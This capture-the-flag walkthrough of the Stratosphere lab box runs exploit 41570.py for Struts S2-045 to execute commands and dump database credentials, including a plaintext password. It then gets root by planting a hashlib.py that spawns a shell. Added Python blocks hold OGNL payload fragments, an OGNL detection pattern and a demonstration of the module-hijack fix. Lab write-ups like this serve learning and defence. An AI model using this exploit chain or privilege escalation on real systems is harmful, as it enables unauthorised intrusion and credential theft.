1. Nmap scan
C:\root> nmap -A 10.10.10.64
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-11 07:43 CST
Nmap scan report for 10.10.10.64 (10.10.10.64)
Host is up (0.33s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u2 (protocol 2.0)
| ssh-hostkey:
| 2048 5b:16:37:d4:3c:18:04:15:c4:02:01:0d:db:07:ac:2d (RSA)
| 256 e3:77:7b:2c:23:b0:8d:df:38:35:6c:40:ab:f6:81:50 (ECDSA)
|_ 256 d7:6b:66:9c:19:fc:aa:66:6c:18:7a:cc:b5:87:0e:40 (ED25519)
80/tcp open http
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 1114
| Date: Wed, 10 Feb 2021 23:44:14 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 404
| Found</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body>
| GetRequest:
| HTTP/1.1 200
| Accept-Ranges: bytes
| ETag: W/"1708-1519762495000"
| Last-Modified: Tue, 27 Feb 2018 20:14:55 GMT
| Content-Type: text/html
| Content-Length: 1708
| Date: Wed, 10 Feb 2021 23:44:11 GMT
| Connection: close
| <!DOCTYPE html>
| <html>
| <head>
| <meta charset="utf-8"/>
| <title>Stratosphere</title>
| <link rel="stylesheet" type="text/css" href="main.css">
| </head>
| <body>
| <div id="background"></div>
| <header id="main-header" class="hidden">
| <div class="container">
| <div class="content-wrap">
| <p><i class="fa fa-diamond"></i></p>
| <nav>
| class="btn" href="GettingStarted.html">Get started</a>
| </nav>
| </div>
| </div>
| </header>
| <section id="greeting">
| <div class="container">
| <div class="content-wrap">
| <h1>Stratosphere<br>We protect your credit.</h1>
| class="btn" href="GettingStarted.html">Get started now</a>
| <p><i class="ar
| HTTPOptions:
| HTTP/1.1 200
| Allow: GET, HEAD, POST, PUT, DELETE, OPTIONS
| Content-Length: 0
| Date: Wed, 10 Feb 2021 23:44:11 GMT
| Connection: close
| RTSPRequest, X11Probe:
| HTTP/1.1 400
| Date: Wed, 10 Feb 2021 23:44:12 GMT
|_ Connection: close
| http-methods:
|_ Potentially risky methods: PUT DELETE
|_http-title: Stratosphere
8080/tcp open http-proxy
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.1 404
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 1114
| Date: Wed, 10 Feb 2021 23:44:12 GMT
| Connection: close
| <!doctype html><html lang="en"><head><t
2. Struts exploitation
Directory brute-forcing turned up the Monitoring directory, and the URLs on both 80 and 8080 end in .action.
Anyone who has done Java development will recognise this straight away: .action is the Struts 2 URL suffix. The usual target is the Tomcat instance on 8080.
The scanner below (written by a Chinese researcher) checks which Struts vulnerability the target is affected by:
https://github.com/Lucifer1993/struts-scan
python struts-scan.py http://10.10.10.64/Monitoring/example/Welcome.action
It reports S2-045 (CVE-2017-5638): Struts 2.3.5 through 2.3.31 and 2.5 through 2.5.10, where the Jakarta multipart parser evaluates a malformed Content-Type header as an OGNL expression, giving unauthenticated remote code execution. Plenty of exploits for it are online, and Kali ships one in its exploitdb copy (searchsploit):
https://www.exploit-db.com/exploits/41570
https://github.com/mazen160/struts-pwn
I went with Kali's built-in 41570.py. Running id worked, and ls showed a db_connect file holding database credentials:
python 41570.py http://10.10.10.64:8080/Monitoring/example/Welcome.action id
python 41570.py http://10.10.10.64:8080/Monitoring/example/Welcome.action ls
python 41570.py http://10.10.10.64:8080/Monitoring/example/Welcome.action "cat db_connect"
Since SSH is open, I tried the ssn credentials there first, but that password did not work, so I dug further into the database. Working through it step by step with the queries below finally produced the password 9tc*rhKuG5TyXvUJOrE^5CK7k, which got me an SSH login as richard:
python 41570.py http://10.10.10.64:8080/Monitoring/example/Welcome.action 'mysql -uadmin -padmin -e "show databases"'
python 41570.py http://10.10.10.64:8080/Monitoring/example/Welcome.action 'mysql -uadmin -padmin -e "use users;show tables"'
python 41570.py http://10.10.10.64:8080/Monitoring/example/Welcome.action 'mysql -uadmin -padmin -e "use users;select * from accounts"'
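To put a check beside the exploit: the S2-045 bug that 41570.py abuses is triggered by an OGNL expression in the Content-Type header of a request to any .action URL. The Python below is an added example, not part of this writeup and not code from the exploit or from struts-scan. It parses a few constructed raw HTTP requests, flags the ones carrying OGNL markers in the headers Struts' multipart parser evaluates (Content-Type for S2-045, Content-Disposition for the related S2-046 variant), and classifies a Struts version string against the affected ranges. The request samples, the marker list and the function names are illustrative assumptions.

```python
import re

# Constructed sample requests (illustrative, not traffic captured from the box).
# The third and fourth carry OGNL in the Content-Type header, which is exactly
# where an S2-045 (CVE-2017-5638) payload goes: Struts' Jakarta multipart parser
# evaluates a malformed Content-Type value as an OGNL expression.
SAMPLE_REQUESTS = [
    "GET /Monitoring/example/Welcome.action HTTP/1.1\r\n"
    "Host: 10.10.10.64:8080\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "POST /Monitoring/example/Welcome.action HTTP/1.1\r\n"
    "Host: 10.10.10.64:8080\r\n"
    "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary\r\n"
    "Content-Length: 0\r\n\r\n",
    "GET /Monitoring/example/Welcome.action HTTP/1.1\r\n"
    "Host: 10.10.10.64:8080\r\n"
    "Content-Type: %{(#_='multipart/form-data')."
    "(#_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)}\r\n\r\n",
    "GET /index.html HTTP/1.1\r\nHost: 10.10.10.64\r\n"
    "Content-Type: ${#context['xwork.MethodAccessor.denyMethodExecution']}\r\n\r\n",
]

# Markers of an OGNL expression: the %{ / ${ delimiters plus identifiers that
# appear in published Struts payloads and never in a legitimate media type.
OGNL_MARKERS = re.compile(
    r"%\{|\$\{|#_memberAccess|@ognl\.OgnlContext|#context\[|"
    r"@java\.lang\.(?:Runtime|ProcessBuilder)",
    re.IGNORECASE,
)

# Headers the Jakarta multipart parser feeds into OGNL evaluation: Content-Type
# for S2-045; Content-Disposition for the related S2-046 variant.
WATCHED_HEADERS = ("content-type", "content-disposition")


def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers); body ignored.
    Header names are lower-cased so lookups are case-insensitive."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return method, path, headers


def find_ognl(headers):
    """Return (header_name, matched_marker) for the first watched header that
    contains an OGNL marker, or None when the headers look clean."""
    for name in WATCHED_HEADERS:
        m = OGNL_MARKERS.search(headers.get(name, ""))
        if m:
            return name, m.group(0)
    return None


def flag_s2_045(raw_requests):
    """Run the check over a list of raw requests; return (index, path, header,
    marker) for every request that looks like an S2-045/S2-046 attempt."""
    hits = []
    for i, raw in enumerate(raw_requests):
        _method, path, headers = parse_request(raw)
        found = find_ognl(headers)
        if found:
            hits.append((i, path, found[0], found[1]))
    return hits


def struts_version_vulnerable_s2_045(version):
    """True if a Struts version string falls in the ranges S2-045 affects:
    2.3.5 through 2.3.31 and 2.5 through 2.5.10 (fixed in 2.3.32 / 2.5.10.1)."""
    v = tuple(int(part) for part in version.split("."))
    return (2, 3, 5) <= v <= (2, 3, 31) or (2, 5) <= v <= (2, 5, 10)


if __name__ == "__main__":
    for idx, path, header, marker in flag_s2_045(SAMPLE_REQUESTS):
        print(f"request {idx}: OGNL marker {marker!r} in {header} for {path}")
    for ver in ("2.3.31", "2.3.32", "2.5.10", "2.5.10.1"):
        print(ver, "vulnerable" if struts_version_vulnerable_s2_045(ver) else "patched")
```

Running it flags requests 2 and 3 and leaves the ordinary multipart POST alone; the same header test dropped into a WAF rule or a Tomcat access-log review is the cheapest way to spot 41570-style traffic, since a legitimate media type never contains `%{` or `#_memberAccess`.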
3. Privilege escalation
Once in, sudo -l shows that I can run one Python script as root.
Opening the script, it imports hashlib. ls -ln, however, shows that I have no write permission on the script itself; if I had, I could simply insert reverse-shell code into it, as on many other boxes.
Since I don't, create a hashlib.py in the same directory as the script root runs (remember, that is /home/richard) and put the shell code in there. When root runs the script, Python puts the script's own directory at the front of sys.path (sys.path[0]), ahead of the standard library, so the hashlib.py sitting there shadows the real module and gets imported instead:
richard@stratosphere:/home$ cd richard/
richard@stratosphere:~$ echo "import pty; pty.spawn('/bin/sh')" > hashlib.py
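The reason this works is a property of the interpreter, not of the script root runs: when Python executes a script it inserts the script's directory at sys.path[0], ahead of the standard library, so any hashlib.py there is imported first. The script below is an added example, not the box's script and not code from the writeup. It reproduces the hijack offline in a temporary directory, using a marker module instead of the pty.spawn payload, and shows that running the interpreter with -I (isolated mode, which leaves the script directory off sys.path) defeats it. The file name test.py, the module contents and the function name are illustrative assumptions.

```python
import os
import subprocess
import sys
import tempfile
import textwrap


def run_victim_with_shadow(module_name="hashlib", isolated=False):
    """Reproduce the hijack offline: a script that does `import hashlib` is run
    once from a clean directory, then again after a hashlib.py has been planted
    next to it.  Because the interpreter inserts the script's own directory at
    sys.path[0], the planted file wins over the standard library on the second run.

    Returns a dict with the resolved module paths and whether the hijack worked.
    The planted module only sets a flag; it stands in for the reverse-shell
    payload the write-up echoes into /home/richard/hashlib.py.
    """
    flags = ["-I"] if isolated else []      # -I drops the script dir from sys.path
    with tempfile.TemporaryDirectory() as workdir:
        # Hypothetical stand-in for the script sudo lets richard run as root.
        victim = os.path.join(workdir, "test.py")
        with open(victim, "w") as f:
            f.write(textwrap.dedent(f"""\
                import {module_name}
                print({module_name}.__file__)
            """))

        def resolve():
            # Run the victim in a fresh interpreter and report where the import landed.
            out = subprocess.run([sys.executable, *flags, victim],
                                 capture_output=True, text=True, check=True)
            return out.stdout.strip()

        clean = resolve()                   # resolves to the stdlib module
        shadow = os.path.join(workdir, module_name + ".py")
        with open(shadow, "w") as f:        # marker in place of a payload
            f.write("LOADED_FROM_SHADOW = True\n")
        shadowed = resolve()                # resolves to the planted file unless isolated
        hijacked = os.path.samefile(os.path.dirname(shadowed), workdir)
        return {"clean": clean, "shadowed": shadowed, "hijacked": hijacked}


if __name__ == "__main__":
    for iso in (False, True):
        r = run_victim_with_shadow(isolated=iso)
        print(f"isolated={iso}: clean   -> {r['clean']}")
        print(f"{'':>15} planted -> {r['shadowed']} (hijacked={r['hijacked']})")
```

The isolated run is the check and the fix in one: `python -I` (3.4 and later) or `python -P` / `PYTHONSAFEPATH` (3.11 and later) keeps the caller's directory off sys.path, and the same protection follows from putting the sudo-allowed script in a root-owned directory. A sudo rule that runs an interpreter on a script inside a user-writable directory is root for that user whichever fix is skipped.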